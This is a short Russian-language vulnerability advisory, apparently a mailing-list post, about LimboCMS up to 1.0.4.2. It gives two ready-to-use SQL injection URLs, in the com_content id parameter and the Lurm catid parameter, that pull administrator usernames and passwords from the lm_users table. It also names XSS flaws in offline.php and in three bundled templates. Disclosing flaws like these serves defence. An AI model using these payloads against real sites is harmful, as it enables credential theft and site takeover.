Множественные уязвимости в LimboCMS <=1.0.4.2 (в т.ч. <=1.0.4 RE 3)
- Возможна sql-injection в компоненте com_content из за недостаточной фильтрации переменной id
пример
http://site/index.php?option=content&task=view&id=-1%20union%20select%20concat(char(0x6c,0x6f,0x67,0x69,0x6e,0x3a),username,char(0x20,0x70,0x61,0x73,0x73,0x77,0x6f,0x72,0x64,0x3a),password)%20from%20lm_users%20where%20id=1&catid=4&Itemid=62
- Sql-inj в Lurm в переменной catid
http://test/index.php?option=lurm&sec=content&task=moreinfo&catid=-1%20union%20select%201,concat(char(0x6c,0x6f,0x67,0x69,0x6e,0x3a),username,char(0x20,0x70,0x61,0x73,0x73,0x77,0x6f,0x72,0x64,0x3a),password),3%20from%20lm_users%20where%20id=1&id=1&fld=usr_hits&Itemid=51
- XSS в файле /includes/offline.php в переменной lm_title
4 так же XSS подвержены 3 шаблона из поставки <=1.0.4 RE 3
sbtpl-02-green
247portal
sbtpl-02-blue
уязвима переменная mosConfig_live_site
С уважением,
HaZeR mailto:[email protected]